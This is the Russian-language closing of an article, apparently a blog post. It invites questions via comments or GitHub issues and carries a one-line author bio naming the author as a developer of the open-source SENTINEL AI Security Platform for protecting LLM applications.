Вопросы? Пишите в комментариях или открывайте issues на GitHub!
Об авторе: Разработчик SENTINEL AI Security Platform — open-source решения для защиты LLM-приложений.